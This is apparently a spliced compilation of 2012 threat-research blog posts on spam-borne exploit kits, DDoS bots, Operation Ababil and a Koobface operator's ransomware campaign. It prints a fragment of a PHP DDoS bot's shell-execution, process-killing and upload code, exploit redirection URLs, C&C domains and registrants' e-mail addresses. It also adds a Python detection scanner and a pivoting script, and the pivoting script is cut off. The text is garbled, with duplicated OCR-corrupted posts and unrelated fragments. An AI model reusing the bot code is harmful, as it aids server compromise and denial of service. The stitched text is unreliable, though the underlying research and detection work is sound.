In this post, I'll profile a recently launched affiliate network selling iPhones that primarily targets Russian-speaking customers, and emphasizes the traffic acquisition scheme used by one of the network's participants.

More details:
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Summarizing Webroot's Threat Blog Posts for August 
(2012-09-28 01:54) 

The following is a brief summary of all of my posts at 
[l]Webroot's Threat Blog for August, 2012. You can 
subscribe to my [2]Webroot's Threat Blog RSS Feed 

or follow me on Twitter: 

01. [3]Spamvertised AICPA themed emails lead to Black Hole 
exploit kit 

02. [4]Spamvertised 'PayPal has sent you a bank transfer' 
themed emails lead to Black Hole exploit kit 

03. [5]Ongoing spam campaign impersonates Linkedln, 
serves exploits and malware 




04. [6]Millions of spamvertised emails lead to W32/Casonline 

05. [7]Cybercriminals impersonate AT &T's Billing Service, 
serve exploits and malware 

06. [8]IRS themed spam campaign leads to Black Hole 
exploit kit 

07. [9]Cybercriminals spamvertise bogus greeting cards, 
serve exploits and malware 

08. [10]Spamvertised 'Federal Tax Payment Rejected' 
themed emails lead to Black Hole exploit kit 

09. [lljSpamvertised 'Fwd: Scan from a Hewlett-Packard 
ScanJet' emails lead to Black Hole exploit kit 

10. [12]Spamvertised 'Royal Mail Shipping Advisory' themed 
emails serve malware 

11. [13]Cybercriminals impersonate Intuit Market, mass mail 
millions of exploits and malware serving emails 

12. [14]Cybercriminals spamvertise PayPal themed 
'Notification of payment received' emails, serve malware 

13. [15]Cybercriminals impersonate UPS, serve malware 

This post has been reproduced from [16]Dancho 
Danchev's blog. Follow him [17]on Twitter. 

New Russian DIY DDoS bot spotted in the wild 

September 28, 2012 - 12:00 am 

By Dancho Danchev 

Over the last couple of years, the modular and open source nature of today's modern DDoS 
(distributed denial of service) bots inevitably resulted in the rise of the DDoS for hire and DDoS 
extortion monetization schemes within the cybercrime ecosystem. 

These maturing business models require constant innovation on behalf of the cybercriminals providing 
the easy to use and manage DIY DDoS bots, the foundation of these business models. What are some 
of the latest developments in this field? Are the malware coders behind these releases actually 
innovating, or are they basically re-branding old malware bots and reintroducing them on the market? 
Let's find out. 

In this post, I'll profile a recently released DIY DDoS bot, which according to its author is a modification 
of the Dirt Jumper DDoS bot. 
Summarizing Webroot's Threat Blog Posts for September (2012-10-01 14:18) 

The following is a brief summary of all of my posts at 
[1]Webroot's Threat Blog for September, 2012. You can 
subscribe to my [2]Webroot's Threat Blog RSS Feed 
or follow me on Twitter: 

01. [3]Spamvertised 'Wire Transfer Confirmation' themed 
emails lead to Black Hole exploit kit 

02. [4]Intuit themed 'QuickBooks Update: Urgent' emails 
lead to Black Hole exploit kit 

03. [5]Cybercriminals resume spamvertising bogus greeting 
cards, serve exploits and malware 

04. [6]Cybercriminals abuse Skype's SMS sending feature, 
release DIY SMS flooders 

05. [7]New Russian service sells access to thousands of 
automatically registered accounts 

06. [8]Spamvertised 'Your Fedex invoice is ready to be paid 
now' themed emails lead to Black Hole Exploit kit 
07. [9]New Russian DIY SMS flooder using ICQ's SMS sending 
feature spotted in the wild 

08. [10]Spamvertised 'US Airways reservation confirmation' 
themed emails serve exploits and malware 

09. [11]Cybercriminals impersonate FDIC, serve client-side 
exploits and malware 

10. [12]Managed Ransomware-as-a-Service spotted in the 
wild 

11. [13]A peek inside a boutique cybercrime-friendly E-shop 
- part four 

12. [14]New E-shop selling stolen credit cards data spotted in 
the wild 

13. [15]From Russia with iPhone selling affiliate networks 

14. [16]New Russian DIY DDoS bot spotted in the wild 

This post has been reproduced from [17]Dancho 
Danchev's blog. Follow him [18]on Twitter. 
PHP Code: 

<?php error_reporting(0);

$base = dirname(__FILE__);

// "stop" command: kill any running perl flooders, delete the sibling scripts, report back to the controller, then end the Apache child (function names as recovered from the scan).
function stoped() {cmdexec("killall -9 perl; killall -9 perl-bin; killall -9 perl-cgi;");
unlink($base."start.php");
unlink($base."fl.pl");
unlink($base."run.pl");
unlink($base."startphp.php");
print "<stopcleandos>Stop & Clean</stopcleandos>";
apache_child_terminate();
}
// Upload handler: stops running flooders, then stores the posted file next to the script.
function UploadFile($File) {cmdexec("killall -9 perl");
cmdexec("killall -9 perl-bin");
cmdexec("killall -9 perl-cgi");
$target_path = ...; // the initial value did not survive the scan
$target_path = $target_path . basename($File['name']);
@move_uploaded_file($File['tmp_name'], $target_path);
}
// Runs a shell command through whichever execution function the host has not disabled; the @ prefix hides any warning.
function cmdexec($cmd) {if (function_exists('system')) @system($cmd);
elseif (function_exists('passthru')) @passthru($cmd);
elseif (function_exists('shell_exec')) @shell_exec($cmd);
elseif (function_exists('exec')) @exec($cmd);
elseif (function_exists('popen')) @popen($cmd, "r");
}
// Rebuilds the script's own URL from the request headers.
function curPageURL() {$pageURL = 'http';
if ($_SERVER["HTTPS"] == "on") {$pageURL .= "s";}
$pageURL .= "://";
if ($_SERVER["SERVER_PORT"] != "80") {$pageURL .= $_SERVER["SERVER_NAME"].":".$_SERVER["SERVER_PORT"].$_SERVER["REQUEST_URI"];
} else {$pageURL .= $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
}
return $pageURL;
}
?>


Dissecting 'Operation Ababil' - an OSINT Analysis - 
Part Two (2012-10-26 15:36) 

With more crowdsourced intelligence on "Operation Ababil" 
published in the recent weeks, it's time to revisit the 
campaign's core strategy for harnessing enough bandwidth 
to successfully take down major U.S. financial institutions. 

As you can remember, in [1]Part One of the OSINT 
analysis for "Operation Ababil" I emphasized the 
crowdsourcing campaign launched by Izz ad-Din al-Qassam 
a.k.a. Qassam Cyber Fighters, which led to the successful 
DDoS attack against these institutions. It appears that this is 
just one of the many stages of the campaign. 

According to security researchers from Prolexic, the attackers 
also relied on [2]a PHP based DDoS attack script known 
as "itsoknoproblembro" that was installed on servers 
susceptible to exploitation through the Bluestork Joomla 
template. By combining crowdsourced bandwidth and 
bandwidth from the compromised servers, the attackers 
managed to successfully achieve their objectives. 

The DDoS script in question, "itsoknoproblembro", has been 
publicly available as a download for months before 
the attacks started, indicating that it was not 
purposely coded to be used in the campaign against major 
U.S. financial institutions. 

Detection rate: PHP_DDoS.html - [3]MD5: 
9ebab9f37f2b17529ccbcdf9209891be - detected by 9 
out of 44 antivirus scanners as PHP/Obfuscated.F; 
Heuristic.BehavesLike.JS.Suspicious.A 
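As an added example (not part of the original post or of any vendor's signature set), a small Python scanner that flags PHP files in a web root carrying the behavioural markers visible in the "itsoknoproblembro" fragment quoted above: the function_exists() fallback ladder over system/passthru/shell_exec/exec/popen, killall -9 against perl, unlink() of sibling scripts, the <stopcleandos> status tag and apache_child_terminate(). The indicator names, the verdict thresholds and the two sample sources are constructed for this example.

```python
"""Heuristic scanner for itsoknoproblembro-style PHP DDoS scripts (added example)."""
import os
import re
from typing import Dict

# Indicators taken from the PHP fragment quoted on this page. Names and
# regexes are constructed for this example; tune them against your own
# sample set before relying on them.
INDICATORS: Dict[str, re.Pattern] = {
    # if (function_exists('system')) @system($cmd); ... one hit per rung
    "exec_fallback_chain": re.compile(
        r"function_exists\s*\(\s*['\"](system|passthru|shell_exec|exec|popen)['\"]"
        r"\s*\)\s*\)\s*@?\1\s*\("
    ),
    # killall -9 perl / perl-bin / perl-cgi: the script stops competing flooders
    "killall_perl": re.compile(r"killall\s+-9\s+perl(?:-bin|-cgi)?"),
    # unlink($base."start.php"): removes sibling scripts on the "stop" command
    "self_cleanup": re.compile(r"unlink\s*\(\s*\$\w+\s*\.\s*['\"][\w.]+['\"]\s*\)"),
    # <stopcleandos>...</stopcleandos>: status tag returned to the controller
    "controller_tag": re.compile(r"</?stopcleandos>"),
    "apache_child_terminate": re.compile(r"apache_child_terminate\s*\("),
    "uploader": re.compile(r"move_uploaded_file\s*\("),
    "error_reporting_off": re.compile(r"error_reporting\s*\(\s*0\s*\)"),
}


def scan_php_source(src: str) -> Dict[str, int]:
    """Return {indicator_name: hit_count} for every indicator present in src."""
    hits: Dict[str, int] = {}
    for name, pattern in INDICATORS.items():
        count = len(pattern.findall(src))
        if count:
            hits[name] = count
    return hits


def verdict(hits: Dict[str, int]) -> str:
    """Collapse the hit table into a triage label.

    A fallback ladder at least three rungs deep next to two or more other
    markers is the combination seen in the quoted script; a single marker on
    its own only merits a closer look.
    """
    ladder = hits.get("exec_fallback_chain", 0)
    if ladder >= 3 and len(hits) >= 3:
        return "itsoknoproblembro-like"
    if hits:
        return "suspicious"
    return "clean"


def scan_tree(root: str) -> Dict[str, str]:
    """Walk a web root and return {path: verdict} for every non-clean PHP file."""
    results: Dict[str, str] = {}
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            if not fname.lower().endswith((".php", ".phtml")):
                continue
            path = os.path.join(dirpath, fname)
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                label = verdict(scan_php_source(fh.read()))
            if label != "clean":
                results[path] = label
    return results


# Constructed sample modelled on the fragment quoted above (not a live file).
SAMPLE_DDOS = r'''<?php error_reporting(0);
$base = dirname(__FILE__);
function stoped() {cmdexec("killall -9 perl; killall -9 perl-bin; killall -9 perl-cgi;");
unlink($base."start.php"); unlink($base."run.pl");
print "<stopcleandos>Stop & Clean</stopcleandos>";
apache_child_terminate();
}
function cmdexec($cmd) {if (function_exists('system')) @system($cmd);
elseif (function_exists('passthru')) @passthru($cmd);
elseif (function_exists('shell_exec')) @shell_exec($cmd);
elseif (function_exists('exec')) @exec($cmd);
elseif (function_exists('popen')) @popen($cmd, "r");
}
?>'''

# Constructed benign control: a single guarded exec() with no fallback ladder.
SAMPLE_BENIGN = r'''<?php
if (function_exists('exec')) { exec('git rev-parse HEAD', $out); }
echo htmlspecialchars($out[0]);
?>'''


if __name__ == "__main__":
    for label, src in (("ddos", SAMPLE_DDOS), ("benign", SAMPLE_BENIGN)):
        found = scan_php_source(src)
        print(f"{label}: {verdict(found)} {found}")
```

Point scan_tree() at a web root to triage every PHP file under it; the sample run labels the constructed DDoS fragment "itsoknoproblembro-like" and the control "clean".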

Next to Prolexic's claims, [4]th3j35t3r also published an 
analysis of the situation that's primarily relying on wishful 
thinking and social engineering, claiming that Anonymous 
supplied the operators of "Operation Ababil" with DDoS 
bandwidth by using a service called Multiboot.me - 
108.162.193.85; 108.162.193.185, AS13335. 

Sample screenshots of the Multiboom.me's GUI: 
With "Operation Ababil" continuing to fuel political tensions 
between the U.S. and Iran, which is blamed for organizing and 
launching these attacks, it's worth emphasizing the basics 
of [5]'false-flag' cyber operations, and 
[6]"aggregate-and-forget" type of botnets. 

When was the first time you heard of Izz ad-Din al-Qassam 
a.k.a. Qassam Cyber Fighters? Appreciate my rhetoric - 
right after they started their crowdsourcing campaign. With 
the group lacking any significant digital fingerprint prior to 
these attacks, virtually anyone can localize their objectives 
with a little twist of politics and propaganda, and easily set 
the foundations for what is now perceived as an Iranian cyber 
operation. 

Moreover, their bandwidth acquisition techniques clearly 
indicate that the attackers are aware of the dynamics 
of modern cyber operations in general, and by doing so, 
chose to acquire bandwidth without outsourcing their 
needs to ubiquitous and sophisticated [7]Russian DDoS on 
demand services, which could have led to the easy 
identification of the service in question, next to the 
cybercriminals behind it. 

Updates will be posted as soon as new intel becomes 
available. 

This post has been reproduced from [8]Dancho 
Danchev's blog. Follow him [9]on Twitter. 

1. http://ddanchev.blogspot.com/2012/09/dissecting-operation-ababil-osint.html 

2. http://www.darkreading.com/advanced-threats/167901091/security/perimeter-security/240008534/serious-attackers-paired-with-online-mob-in-bank-attacks.html 

3. https://www.virustotal.com/file/3602c1600f47da49795b9dd7ed353beab37399fbe6565fe4b558455b285b04ee/analysis/1351213681/ 

4. http://webcache.googleusercontent.com/search?hl=en&tbo=d&biw=1366&bih=667&sclient=psy-ab&q=cache%3Ahttp%3A%2F%2Fth3j35t3r.wordpress.com%2F2012%2F09%2F26%2Fanon v 

5. http://www.zdnet.com/blog/security/should-a-targeted-country-strike-back-at-the-cyber-attackers/6194 

6. http://ddanchev.blogspot.com/2009/11/pricing-scheme-for-ddos-extortion.html 

7. http://blog.webroot.com/2012/06/06/ddos-for-hire-services-offering-to-take-down-your-competitors-web-sites-going-mainstream/ 

8. http://ddanchev.blogspot.com/ 

9. http://twitter.com/danchodanchev 


Summarizing ZDNet's Zero Day Posts for October (2012-11-02 01:47) 

The following is a brief summary of all of my posts at 
[1]ZDNet's Zero Day for October, 2012. You can subscribe to 
[2]Zero Day's main feed, or follow me on Twitter: 

01. [3]Report: Large US bank hit by 20 different crimeware 
families 

02. [4]Localized Dorkbot malware variant spreading across 
Skype 

03. [5]Sopelka botnet drops Citadel, Feodo, and Tatanga 
crimeware variants 

04. [6]Adobe patches 6 critical security flaws in Shockwave 

This post has been reproduced from [7]Dancho 
Danchev's blog. Follow him [8]on Twitter. 

1. http://zdnet.com/blog/security 

3. http://www.zdnet.com/report-large-us-bank-hit-by-20- 

4. http://www.zdnet.com/localized-dorkbot-malware-variant-spreading-across-skype-7000006021/ 

5. http://www.zdnet.com/sopelka-botnet-drops-citadel-feodo-and-tatanga-crimeware-variants-7000006260/ 

6. http://www.zdnet.com/adobe-patches-6-critical-security-flaws-in-shockwave-7000006272/ 
Summarizing Webroot's Threat Blog Posts for October (2012-11-02 02:34) 

The following is a brief summary of all of my posts at 
[1]Webroot's Threat Blog for October, 2012. You can 
subscribe to my [2]Webroot's Threat Blog RSS Feed 
or follow me on Twitter: 

01. [3]Russian cybercriminals release new DIY SMS flooder 

02. [4]Upcoming Webroot presentation on Cyberjihad and 
Cyberterrorism at RSA Europe 2012 

03. [5]Recently launched E-shop sells access to hundreds of 
hacked PayPal accounts 

04. [6]New Russian service sells access to compromised 
Steam accounts 

05. [7]'Vodafone Europe: Your Account Balance' themed 
emails serve malware 

06. [8]Cybercriminals impersonate UPS, serve client-side 
exploits and malware 

07. [9]'Your video may have illegal content' themed emails 
serve malware 
08. [10]Cybercriminals spamvertise 'Amazon Shipping 
Confirmation' themed emails, serve client-side exploits and 
malware 

09. [11]American Airlines themed emails lead to the Black 
Hole Exploit Kit 

10. [12]Bogus Facebook notifications lead to malware 

11. [13]Spamvertised 'KLM E-ticket' themed emails serve 
malware 

12. [14]'Intuit Payroll Confirmation inquiry' themed emails 
lead to the Black Hole exploit kit 

13. [15]Malware campaign spreading via Facebook direct 
messages spotted in the wild 

14. [16]'Regarding your Friendster password' themed emails 
lead to Black Hole exploit kit 

15. [17]Russian cybercriminals release new DIY DDoS 
malware loader 

16. [18]PayPal 'Notification of payment received' themed 
emails serve malware 

17. [19]Cybercriminals impersonate Delta Airlines, serve 
malware 

18. [20]'Your UPS Invoice is Ready' themed emails serve 
malware 

19. [21]Bogus Skype 'Password successfully changed' 
notifications lead to malware 

20. [22]RSA Conference Europe 2012 - recap 

21. [23]Cybercriminals impersonate Verizon Wireless, serve 
client-side exploits and malware 

22. [24]Spamvertised 'BT Business Direct Order' themed 
emails lead to malware 

23. [25]Cybercriminals spamvertise millions of British 
Airways themed e-ticket receipts, serve malware 

24. [26]Cybercriminals spamvertise millions of bogus 
Facebook notifications, serve malware 

25. [27]Nuclear Exploit Pack goes 2.0 

This post has been reproduced from [28]Dancho 

Managed Embedding of Malicious iFrames Through 
Compromised Accounts as a Service (2012-11-24 00:55) 

This post has been reproduced from [1]Dancho 
Danchev's blog. Follow him [2]on Twitter. 

1. http://ddanchev.blogspot.com/ 

2. http://twitter.com/danchodanchev 
Koobface Botnet Master KrotReal Back in Business, 
Distributes Ransomware And Promotes BHSEO Service/Product (2012-11-26 03:52) 

On January 09, 2012 I exposed [1]Koobface botnet 
master KrotReal. On January 16, 2012, [2]The New York 
Times went public with data from Facebook Inc. 
exposing the identities of the rest of the group. What 
happened? With the botnet masters still at large, and the 
Koobface botnet currently offline, a logical question emerges: 
what are these cybercriminals up to now that they're no longer 
involved in managing Koobface? 

Cybercrime as usual! 

Continuing to [3]squeeze the cybercrime ecosystem, 
and keep known bad actors on a short leash, in this 
intelligence brief I'll expose [4]Anton Nikolaevich 
Korotchenko a.k.a. KrotReal's latest activities, 
indicating that he's currently busy experimenting with two 
projects: 

• A Black Hat SEO (Search Engine Optimization) related 
service/product 

• An underground traffic exchange/pay-per-install network 
currently distributing localized Ransomware 

Just like the case when KrotReal's real life identity was 
revealed due to a single mistake he made over a period of 
several years, namely registering a Koobface command and 
control server using his personal GMail account, in this 
intelligence brief I'll once again expose his malicious and 
fraudulent activities by profiling two of the domains he 
most recently registered, once again with his personal GMail 
account. 

Let's start by profiling his Black Hat SEO service/product, 
currently hosted on one of the domains he registered in 
2011. 

trafficconverter.in - 176.9.146.78 - Email: 
krotreal@gmail.com 

Created On:28-Jul-2011 12:37:45 UTC 

Last Updated On:28-Jun-2012 08:11:43 UTC 

Expiration Date:28-Jul-2013 12:37:45 UTC 
The service/product apparently allows the systematic abuse 
of legitimate blogging platforms such as Google's 
Blogger and Wordpress, next to Yoom CMS. KrotReal himself 
might be using the tool, or sell/offer access to it as a 
managed service. Does this mean he's not using it himself 
to monetize the hijacked legitimate traffic that he's 
able to obtain through his Black Hat SEO campaigns? Not at 
all. 


More domains presumably to be used for Black Hat SEO 
purposes are registered with KrotReal's personal email 
account (krotreal@gmail.com). 

How is he actually monetizing the hijacked traffic? Keep 
reading. Now it's time to expose his malicious activities 
in the form of spreading localized Ransomware variants. 
For the record, [5]the Koobface gang distributed 
primarily scareware - there's evidence that the group was 
also involved in other [6]malicious campaigns - and even 
[7]bragged about the fact that they're not damaging 
infected user PCs. 

What's particularly interesting about profiling this campaign 
is that it's a great example of double-layer monetization, 
as KrotReal is earning revenue through the Traffic 
Holder Adult Affiliate Program, in between serving 
client-side exploits and ultimately dropping Ransomware on 
the affected host using the same redirection chain. 

Sample malicious domain name reconnaissance: 

traffictracker.in - 176.9.146.78 (AS24940) - Email: 
krotreal@gmail.com 

Created On:22-Nov-2011 13:42:53 UTC 

Last Updated On:22-Nov-2012 22:33:25 UTC 

Expiration Date:22-Nov-2013 13:42:53 UTC 

Responding to the same IP 176.9.146.78 (AS24940): 

allcelebrity.ru 

easypereezd.ru 

Sample malicious activity redirection chain: 

hxxp://traffictracker.in/in.cgi?11&parameter=nude+girls&CS=1 -> 
hxxp://celeb-search.com/in.php?source=th&q=nude+girls -> 
hxxp://celeb-search.com/in3.php?source=th&q=nude+girls -> 
hxxp://www.trafficholder.com/in/in2.php?ppillow-pics_erotic -> 
hxxp://hit.trafficholder.com/cgi-bin/traffic/process.fcgi?a=ppillow&c=1&n=pics_erotic&r= -> 
hxxp://gravityexp.com/go.php?sid=12 -> 
hxxp://nosnowfevere.com/ZqRqk (exploiting [8]CVE-2008-5353) -> 
hxxp://nosnowfevere.com/oxsXAE?KpDzQ=61 -> 
hxxp://nosnowfevere.com/ZqRqk -> 
hxxp://nosnowfevere.com/EHSvFc -> 
hxxp://nosnowfevere.com/XMDrkH 

KrotReal's Traffic Holder Adult Affiliate Network ID is 
ppillow-pics_erotic. 
Malicious domain names reconnaissance: 

gravityexp.com - returns "Digital River GmbH" on its home 
page - 46.163.117.144 - Email: 
francesca.muglia.130@istruzione.it 

Updated Date: 30-aug-2012 
Creation Date: 30-aug-2012 
Expiration Date: 30-aug-2013 

nosnowfevere.com - 91.211.119.32 - Email: 
djbroning@definefm.com 

Updated Date: 25-nov-2012 
Creation Date: 25-nov-2012 
Expiration Date: 25-nov-2013 

Upon successful client-side exploitation, the campaign drops 
[9]MD5: d234a238eb8686d08cd4e0b8b705da14 
- detected by 10 out of 43 antivirus scanners as 
Trojan.Winlock.7431 

Sample screenshot displayed to users from 
geolocated countries: 

Second screenshot of a sample page displayed to 
affected U.K. users: 

Additional malicious payload obtained from the 
campaign: 

[10] MD5: fd47fe3659d7604d93c3ce0c0581fed7 - 
detected by 4 out of 44 antivirus scanners as 
Exploit:Java/CVE-2012-5076.BBW 

[11] MD5: e47991d7f172e893317f44ee8afe3811 - 
detected by 5 out of 44 antivirus scanners as JS:Pdfka-gen 
[Expl] 

[12] MD5: 7e58703026c7ffba05ac0d2ae4d3c62f - 
detected by 5 out of 44 antivirus scanners as 
Exploit:Java/CVE-2012-1723!generic 

Ransomware C&C malicious domain name 
reconnaissance: 

sarscowoy.com - currently responds to 176.28.22.32 
(AS20773); 176.28.14.42 (AS20773) - Email: 
rmasela@ymail.com 

On 2012-06-21 the domain responded 
to 204.13.160.28 (AS33626), then on 2012-07-01 it changed 
IPs to 46.163.113.79 (AS20773), then again on 2012-11-14 it 
changed IP to 176.28.14.42 (AS20773), followed by one last 
change on 2012-11-24 to 176.28.22.32 (AS20773). 

One more MD5 is known to have phoned back to the same 
Ransomware C&C URL - [13]MD5: 
1600577edece1efe11c75158f9dd24db - detected by 28 
out of 38 antivirus scanners as Trojan:Win32/Tobfy.H 

Interestingly, the cybercriminals behind the Ransomware left 
the administration panel open to anyone who 
wants to take a look at the way the whole process works. 

Sample screenshot of the administration panel: 
Second screenshot of the administration panel, showing a 
directory listing, including unique and localized files for 
potential victims from multiple countries: 
More domains are currently responding to the same 
IPs (176.28.22.32; 176.28.14.42). 

What we've got here is a great example of the following: 
when you don't fear legal prosecution for your 
fraudulent activities over a period of several years, earning 
you potentially hundreds of thousands of dollars, you just 
launch new projects, continuing to cause more harm and 
fraudulently obtain funds from infected victims. 

For those who are interested in more details on the technical 
side of this Ransomware, you should [14]consider 
going through this research. 

Hat tip to Steven Adair from [15]Shadowserver for the 
additional input. 
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Koobface Botnet Master KrotReal Back in Business, 
Distributes Ransomware And Promotes BHSEO Ser¬ 
vice/Product (2012-11-26 03:52) 

On January 09, 2012 I exposed [lJKoobface botnet 
master KrotReal. On January 16, 2012, [2]The New York 
Times went public with data from Facebook Inc. 

exposing the identities of the rest of the group. What 
happened? With the botnet masters still at large, and the 




















Koobface botnet currently offline, a logical question emerges 
- what are 

these cybercriminals up to now that they're no longer 
involved in managing Koobface? 

Cybercrime as usual! 

Continuing to [3]squeeze the cybercrime ecosystem, 

and keep known bad actors on a short leash, in this in¬ 
telligence brief I'll expose [4]Anton Nikolaevich 
Korotchenko a.k.a KrotReal's s latest activities, 
indicating that he's currently busy experimenting with two 
projects: 

• A Black Hat (SEO) Search Engine Optimization related 
service/product 

• Underground traffic exchange/pay-pay-install network 
currently distributing localized Ransomware 

Just like the case when KrotReal's real life identity was 
revealed due to a single mistake he made over a period of 

several years, namely to register a Koobface command and 
control server using his personal GMail account, in this 

intelligence brief I'll once again expose his malicious and 
fraudulent activities by profiling two of the most recently 
domains he once again registered with his personal GMail 
account. 

Let's start by profiling his Black Hat SEO service/product, 
currently hosted on one of the domains he registered in 
2011 . 



trafficconverter.in - 176.9.146.78 - Email: 
krotreal@gmail.com 

Created On:28-Jul-2011 12:37:45 UTC 

Last Updated On:28-Jun-2012 08:11:43 UTC 

Expiration Date:28-Jul-2013 12:37:45 UTC 
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The service/produce apparently allows the systematic abuse 
of legitimate blogging platforms such as Google's 

Blogger and Wordpress, next to Yoom CMS. KrotReal himself 
might be using the tool, or sell/offer access to it as a 

managed service. Does this mean he's not using it by himself 
to monetize the hijacked legitimate traffic that he's 

able to obtain through his Black Hat SEO campaigns? Not at 
all. 

More domains presumably to be used for Black Hat SEO 
purposes registered with KrotReal's personal email 

account (krotreal@gmail.com): 

superstarfind.com 

celeb-search.com 

myown-search.com 

myfindstuff.com 


network-find.com 


coolfind200309.com 


experimentsearch.com 

fashion-overview.com 
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krotpong.com 

adultpartypics.com 

findhunt.com 

How is he actually monetizing the hijacked traffic? Keep 
reading. Now it's time to expose his malicious activi¬ 
ties in the form of spreading localized Ransomware variants. 
For the record, [5]the Koobface gang distributed 

primarly scareware - there's evidence that the group was 
also involved in other [6]malicious campaigns - and even 

[7]bragged about the fact that they're not damaging 
infected user PCs. 

What's particularly interesting about profiling this campaign, 
is that it's a great example of double-layer mone¬ 
tization, as KrotReal is earning revenue through the Traffic 
Holder Adult Affiliate Program, in between serving 

client-side exploits and ultimately dropping Ransomware on 
the affected host using the same redirection chain. 

Sample malicious domain name reconnaissance: 


traffictracker.in - 176.9.146.78 (AS24940) - Email: 
krotreal@gmail.com 

Created On:22-Nov-2011 13:42:53 UTC 

Last Updated On:22-Nov-2012 22:33:25 UTC 

Expiration Date:22-Nov-2013 13:42:53 UTC 

Responding to the same IP 176.9.146.78 (AS24940): 

allcelebrity.ru 

easypereezd.ru 

Sample malicious activity redirection chain: 

hxxp.y/traffictracker. in/in. cgi?l 1 &parameter=nude+girls 
&CS=1 

-> 

hxxp://celeb-search. com/in.php?source=th 
&q=nude+girls 
-> 

hxxp://celeb-search. com/in3.php ?source=th 

&q=nude+girls -> hxxp://www. trafficholder.com/in/in2.php? 
ppillow-pics _erotic -> hxxp://hit. trafficholder. com/cgi- 
bin/traffic/process.fcgi?a=ppillow &c=l &n=pics_erotic &r= 
-> hxxp:/,/gravityexp.com/go.php?sid= 12 -> 
hxxp://nosnowfevere.com/ZqRqk (exploiting [8]CVE-2008- 
5353) -> hxxp://nosnowfevere.com/oxsXAE?KpDzQ=61 -> 
hxxp://nosnowfevere. com/ZqRqk -> 



hxxp://nosno wfe i /ere. com/EHSvFc -> 
hxxp://nosno wfe i /ere. com/XMDrkH 

KrotReal's Traffic Holder Adult Affiliate Network ID is ppillow- 
pics _erotic. 
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Malicious domain names reconnaissance: 
gravityexp.com 

returns 

"Digital 

River 

GmbH" 

on 

its 

home 

page 

46.163.117.144 


Email: 


francesca.muglia.130@istruzione.it 

Updated Date: 30-aug-2012 

Creation Date: 30-aug-2012 

Expiration Date: 30-aug-2013 

nosnowfevere.com - 91.211.119.32 - Email: 
djbroning@definefm.com 

Updated Date: 25-nov-2012 

Creation Date: 25-nov-2012 

Expiration Date: 25-nov-2013 

Upon successful client-side exploitation, the campaign drops 

[9]MD5: d234a238eb8686d08cd4e0b8b705cJal4 

- detected by 10 out of 43 antivirus scanners as 
Trojan. Win lock.7431 

Sample screenshot displayed to users from 
geolocated countries: 
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Second screenshot of a sample page displayed to 
affected U.K users: 
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Additional malicious payload obtained from the 
campaign: 


[10] MD5: fd47fe3659d7604d93c3ce0c0581fed7 - 

detected by 4 out of 44 antivirus scanners as 
Exploit:Java/CVE- 

2012-5076.BBW 

[11] MD5: e47991d7fl72e893317f44ee8afe3811 - 

detected by 5 out of 44 antivirus scanners as JS:Pdfka-gen 
[Expl] 

[12] MD5: 7e58703026c7ffba05ac0d2ae4d3c62f - 

detected by 5 out of 44 antivirus scanners as 
Exploit:Java/CVE- 

2012-1723!generic 

Ransomware C &C malicious domain name 
reconnaissance: 

sarscowoy.com - currently responds to 176.28.22.32 
(AS20773); 176.28.14.42 (AS20773) - Email: 
rmasela@ymail.com On 2012-06-21 the domain responded 
to 204.13.160.28 (AS33626), then on 2012-07-01 it changed 
IPs to 

46.163.113.79 (AS20773), then again on 2012-11-14 it 
changed IP to 176.28.14.42 (AS20773), followed by one last 

change on 2012-11-24 to 176.28.22.32 (AS20773) 

One more MD5 is known to have phoned back to the same 
Ransomware C &C URL - [13]MD5: 

1600577edecelefellc75158f9dd24db detected by 28 
out of 38 antivirus scanners as Trojan:Win32/Tobfy.H 


Interestingly, the cybercriminals behind the Ransomware left the administration panel open to anyone who wants to take a look at the way the whole process works. Sample screenshot of the administration panel:

Second screenshot of the administration panel, showing a directory listing, including unique and localized files for potential victims from multiple countries:

More domains are currently responding to the same IPs (176.28.22.32; 176.28.14.42):

bussinesmail.org - Email: belov28@gmail.com

elitesecuritynet.com - Email: pescifabio83@yahoo.fi

ideasdeunion.com - Email: esbornikk@aol.com

ineverworrynet.com - Email: pescifabio83@yahoo.fi

testcitycheckers.com - Email: pescifabio83@yahoo.fi

uneugroup.com - Email: anders_christensen@yahoo.com

winntegroups.eu - Email: robertobona69@yahoo.com

sexchatvideo.org - Email: daddario.maria@virgilio.it

quasarnet.co - Email: valter.bars@venezia.pecavvocati.it

bestconsultingoffice.com

apaineal.ru
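The two pivots the post relies on, domains co-hosted on the C&C IPs and domains sharing a registrant e-mail, are the kind of thing a defender scripts rather than reads off by eye, and the dated resolution history of the C&C domain is worth keeping as structured data too. The following is an added example, not code from the post: it transcribes the domains, IPs, ASNs and registrant addresses listed above into records, clusters them by hosting and by registrant e-mail, turns the sarscowoy.com history into dated hops, and flattens everything into a blocklist. The record layout, the function names and the attachment of every co-hosted domain to both C&C IPs (the post lists them collectively) are assumptions.

```python
"""Pivoting on the infrastructure listed in the post (added example, not the post's code).

RECORDS and SARSCOWOY_HISTORY transcribe the domains, IPs, ASNs and registrant
e-mails given in the post; the record layout and function names are assumptions.
"""
from collections import defaultdict
from dataclasses import dataclass
from datetime import date
from typing import Dict, List, Optional, Tuple


@dataclass(frozen=True)
class DomainRecord:
    """One domain as the post observed it: where it resolves and who registered it."""
    domain: str
    ips: Tuple[str, ...]          # IPs the post says the domain currently responds to
    email: Optional[str] = None   # registrant e-mail from WHOIS; None where the post gives none


# The two IPs the post names as the current ransomware C&C hosting.
CNC_IPS = ("176.28.22.32", "176.28.14.42")

# Transcribed from the post: the C&C domain plus the domains listed as "currently
# responding to the same IPs". The post gives them collectively, so each one is
# attached to both C&C IPs here (an assumption about which of the two it uses).
RECORDS = [
    DomainRecord("sarscowoy.com", CNC_IPS, "rmasela@ymail.com"),
    DomainRecord("bussinesmail.org", CNC_IPS, "belov28@gmail.com"),
    DomainRecord("elitesecuritynet.com", CNC_IPS, "pescifabio83@yahoo.fi"),
    DomainRecord("ideasdeunion.com", CNC_IPS, "esbornikk@aol.com"),
    DomainRecord("ineverworrynet.com", CNC_IPS, "pescifabio83@yahoo.fi"),
    DomainRecord("testcitycheckers.com", CNC_IPS, "pescifabio83@yahoo.fi"),
    DomainRecord("uneugroup.com", CNC_IPS, "anders_christensen@yahoo.com"),
    DomainRecord("winntegroups.eu", CNC_IPS, "robertobona69@yahoo.com"),
    DomainRecord("sexchatvideo.org", CNC_IPS, "daddario.maria@virgilio.it"),
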